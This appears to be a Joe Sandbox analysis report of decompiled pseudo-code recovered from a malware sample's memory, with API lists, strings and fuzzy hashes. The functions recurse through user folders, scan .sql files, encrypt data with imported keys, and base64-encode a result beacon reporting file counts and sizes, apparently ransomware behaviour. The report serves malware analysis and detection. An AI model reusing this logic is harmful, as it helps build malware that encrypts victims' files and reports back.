Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
String ID: POST$popkadurak
API String ID: 1287001821-2707760125
Opcode ID: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
Instruction ID: 07cc2bf360f6f6a29bb15e7d02c1104266da83b48d801c3e1682e08f9cf90ea1
Opcode Fuzzy Hash: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
Instruction Fuzzy Hash: 7371B371E00309BBDB10ABA5DD45FAEBF78FF88722F144125EA04B7241EB789546CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F585670 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 169
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0F585670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				void* _v12;
				int _v16;
				void* _v20;
				char _v164;
				void* __esi;
				BYTE* _t33;
				int _t41;
				CHAR* _t44;
				int _t52;
				void* _t53;
				char _t60;
				BYTE* _t65;
				char* _t69;
				signed int _t70;
				void* _t75;
				signed int _t78;
				CHAR* _t85;
				int _t87;
				long _t88;
				void* _t89;
				void* _t91;
				void* _t94;

				_t82 = __edx;
				_t70 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
				_v20 = _t33;
				if(_t33 == 0) {
					_t65 = 0;
					_t85 = 0;
				} else {
					_t4 =  &(_t33[0x800]); // 0x800
					_t85 = _t4;
					_t65 = _t33;
				}
				_push(_v12);
				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
				_push(0);
				_push(_t70);
				_push(0);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_push(_t70);
				_push(0);
				_t94 = _t91 + 0x14;
				_push(0);
				_push(_t70);
				_push(0);
				E0F583BC0( &_v164);
				E0F587490( &_v164, _t82);
				E0F5872A0( &_v164);
				E0F5870A0( &_v164, _t65 + lstrlenW(_t65) * 2);
				_t41 = lstrlenW(_t65);
				_t75 =  *0xf592a78; // 0x0
				_v8 = _t41;
				if(_t75 != 0) {
					VirtualFree(_t75, 0, 0x8000);
				}
				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
				 *0xf592a78 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44, "%S", L"popkadurak");
					_t94 = _t94 + 0xc;
				}
				_t87 = _v8 + _v8;
				E0F585F00(_t65, _t87, _t87);
				_v16 = _v8 * 8;
				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
					GetLastError();
				}
				_t22 = lstrlenA(_t85) + 4; // 0x4
				_t88 = _t22;
				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
				_t52 = lstrlenA(_t85);
				_t78 = _v12;
				_t53 = _t52 + 2;
				if(_t78 == 0) {
					L11:
					_v8 = 0;
				} else {
					_v8 = _t78;
					if(_t53 >= _t88) {
						goto L11;
					}
				}
				_t89 = 0;
				if(lstrlenA(_t85) != 0) {
					_t69 = _v8;
					do {
						_t60 =  *((intOrPtr*)(_t89 + _t85));
						if(_t60 != 0xa && _t60 != 0xd) {
							 *_t69 = _t60;
							_t69 = _t69 + 1;
						}
						_t89 = _t89 + 1;
					} while (_t89 < lstrlenA(_t85));
				}
				E0F5854F0(_v8, 0, _t78, 0);
				_t68 =  !=  ? 1 : 0;
				VirtualFree(_v12, 0, 0x8000);
				E0F587D70( &_v164);
				VirtualFree(_v20, 0, 0x8000);
				_t59 =  !=  ? 1 : 0;
				return  !=  ? 1 : 0;
			}

APIs

VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F585696
wsprintfW.USER32 ref: 0F5856BF
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F585708
lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F58571E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585739
lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F58574B
VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F585757
wsprintfA.USER32 ref: 0F58576D
CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F58579E
GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F5857A8
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857B5
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F5857C4
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857CE
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857EB
lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F585804
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F58583D
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585854

Strings

action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0F5856B9
popkadurak, xrefs: 0F585746, 0F585762

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
API String ID: 823394411-2102589890
Opcode ID: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
Instruction ID: 248f84567f179666a6ba6c55420372e62117f4a21e51764751ad9fcf69e89744
Opcode Fuzzy Hash: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
Instruction Fuzzy Hash: 5A51D770B00305FFEB24AB64DD86F9E7B78FB44711F540065F601B6282EBB8AA16DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F586BA0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F586BA0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F588260(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
												_t15 = _t67 + 1; // 0x1
												_v12 = E0F586B40(_t15 + _t50);
											}
											VirtualFree(_t67, 0, 0x8000);
										}
										_t66 = _v16;
									}
									CloseHandle(_t54);
									_t53 = _v12;
									if(_t53 == 0) {
										L19:
										 *_v20 = 0;
										goto L20;
									}
								}
							}
						}
					}
					break;
					L20:
				} while (FindNextFileW(_v8,  &_v620) != 0);
				FindClose(_v8);
				return _t53;
			}

APIs

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586BC4
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
lstrcatW.KERNEL32(00000000,?), ref: 0F586C24
lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
lstrlenA.KERNEL32(*******************,?,?), ref: 0F586CCE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586CE9
CloseHandle.KERNEL32(00000000,?,?), ref: 0F586CF3
FindNextFileW.KERNEL32(?,?,?,?), ref: 0F586D1C
FindClose.KERNEL32(?,?,?), ref: 0F586D2D

Strings

*******************, xrefs: 0F586CB9, 0F586CC9
.sql, xrefs: 0F586C54

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
String ID: *******************$.sql
API String ID: 3616287438-58436570
Opcode ID: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
Instruction ID: 1599c5dc599c77c2f50f7025807eb1bc4c5c8c6536f040296bb1e9d9b3eb5869
Opcode Fuzzy Hash: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
Instruction Fuzzy Hash: 67418F31601216BBDB10BB60DD48FAA7BACFF04711F505076E902F6241EB78AA17DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F588400 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96
encryptionlibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0F588400(intOrPtr __ecx, intOrPtr __edx) {
				long* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t25;
				struct HINSTANCE__* _t33;
				_Unknown_base(*)()* _t34;
				long _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t48;

				_t46 = 0;
				_v16 = __ecx;
				_t25 =  &_v8;
				_v12 = __edx;
				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
				if(_t25 == 0) {
					L10:
					return _t46;
				} else {
					_t42 = 0;
					do {
						_t4 = _t42 + 0x61; // 0x61
						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
						_t42 = _t42 + 1;
					} while (_t42 < 0x1a);
					_t40 = __edx + 1;
					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
					if(_t47 == 0 || _v12 >= _t40) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000);
						goto L10;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F588420
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F588448
GetModuleHandleA.KERNEL32(?), ref: 0F58849D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F58292B), ref: 0F588500
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F58292B), ref: 0F58850E

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F5884B5, 0F5884B8
Advapi32.dll, xrefs: 0F5884A7, 0F5884AA

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
Instruction ID: c06f77bf9ffcd752874f0cfdc17745f53fecf6620f1a6133f364a53d8b8a4480
Opcode Fuzzy Hash: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
Instruction Fuzzy Hash: EE31E431A00208FFDB109FA5DD49BEEBF78FB04712F504069E601F2290D7789A169B65

Uniqueness

Uniqueness Score: -1.00%

Function 0F586682 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0F586682(void* __eax, void* __edx) {
				void* _t26;
				int _t30;
				intOrPtr _t31;
				int _t33;
				long _t36;
				void* _t49;

				_t26 = _t49 - 4;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1);
				if(_t26 != 0) {
					L6:
					 *(_t49 - 0xc) = 0;
					if(CryptImportKey( *(_t49 - 4),  *(_t49 + 8),  *(_t49 + 0xc), 0, 0, _t49 - 8) != 0) {
						 *((intOrPtr*)(_t49 - 0x10)) = 0xa;
						_t31 = _t49 - 0x10;
						__imp__CryptGetKeyParam( *(_t49 - 8), 8, _t49 - 0x18, _t31, 0);
						 *((intOrPtr*)(_t49 - 0x1c)) = _t31;
						 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x14)))) = 0xc8;
						_t33 =  *(_t49 + 0x10);
						__imp__CryptEncrypt( *(_t49 - 8), 0, 1, 0, _t33,  *((intOrPtr*)(_t49 + 0x14)),  *((intOrPtr*)(_t49 + 0x18)));
						 *(_t49 - 0xc) = _t33;
						 *((intOrPtr*)(_t49 - 0x14)) = GetLastError();
						if( *(_t49 - 0xc) == 0) {
							E0F5836C0(_t34);
						}
					}
					CryptReleaseContext( *(_t49 - 4), 0);
					LeaveCriticalSection(0xf592a48);
					_t30 =  *(_t49 - 0xc);
					L10:
					return _t30;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					_t30 = 0;
					goto L10;
				}
				__imp__CryptAcquireContextW(_t49 - 4, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				_t30 = 0;
				goto L10;
			}

0x0f58668d
0x0f586691
0x0f586699
0x0f5866d1
0x0f5866d1
0x0f5866f4
0x0f5866f6
0x0f5866ff
0x0f58670d
0x0f586713
0x0f586719
0x0f586727
0x0f586735
0x0f58673b
0x0f586744
0x0f58674b
0x0f586750
0x0f586750
0x0f58674b
0x0f58675b
0x0f586766
0x0f58676c
0x0f58676f
0x0f586772
0x0f586772
0x0f58669b
0x0f5866a6
0x0f5866ca
0x00000000
0x0f5866ca
0x0f5866b7
0x0f5866bf
0x00000000
0x0f5866c8
0x0f5866c1
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001), ref: 0F586691
GetLastError.KERNEL32 ref: 0F58669B
CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 0F5866B7
CryptImportKey.ADVAPI32(?,?,00000000,00000000,00000000,?), ref: 0F5866EC
CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000), ref: 0F58670D
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?), ref: 0F586735
GetLastError.KERNEL32 ref: 0F58673E
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F58675B
LeaveCriticalSection.KERNEL32(0F592A48), ref: 0F586766

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F586686, 0F5866AC

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireErrorLast$CriticalEncryptImportLeaveParamReleaseSection
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 1420411239-1948191093
Opcode ID: b5d58dd223fa5d6830e4eb284db72c60a51ccdc2d4666c6ef3dc5717b80029b4
Instruction ID: fad92f8556afac1451f49550fb1aa22346de9ed5594c33eb2ad2265e0003213e
Opcode Fuzzy Hash: b5d58dd223fa5d6830e4eb284db72c60a51ccdc2d4666c6ef3dc5717b80029b4
Instruction Fuzzy Hash: EA314D75A40305FFDB10DFA0D945FEE7BB8BB48701F104519F601FA280DBB9AA069BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F586DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F586DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0F586BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					L0F586D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = L0F586AB0( *_t54, _t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0F586DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 0F586780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
Part of subcall function 0F586780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8

Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
Part of subcall function 0F586BA0: lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586BC4
Part of subcall function 0F586BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
Part of subcall function 0F586BA0: lstrcatW.KERNEL32(00000000,?), ref: 0F586C24
Part of subcall function 0F586BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
Part of subcall function 0F586BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
Part of subcall function 0F586BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
Part of subcall function 0F586BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
Part of subcall function 0F586BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
Part of subcall function 0F586BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586E23
lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586E45
lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586E7C
lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586E96
lstrcatW.KERNEL32(00000000,?), ref: 0F586EA8
lstrcatW.KERNEL32(00000000,0F58FF7C), ref: 0F586EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F586F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F586F2E

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecial$lstrlen$AllocFirstVirtual$CloseCreateNextReadSize
String ID:
API String ID: 775717952-0
Opcode ID: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
Instruction ID: 1921ea6ff382926096f9548d92552ca3f3b3b1a08fc4c7adfd421c56c616a185
Opcode Fuzzy Hash: eb7096f8c745a9cd79bc42c0dfb2a8003c2f09aa536ee2c2e2d6ce94ab804d88
Instruction Fuzzy Hash: 52319E31A00219EBCF11BF64DD849AEBBB8FF44311F0441A6E805F6202DB34AE16DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F5834F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F5834F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0F583673,00000000), ref: 0F583504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0F583673,00000000), ref: 0F58351C
CryptStringToBinaryA.CRYPT32(0F583673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F583535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F58354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0F583673,00000000), ref: 0F583561
wsprintfW.USER32 ref: 0F583587
wsprintfW.USER32 ref: 0F583597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0F583673,00000000), ref: 0F5835A9

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
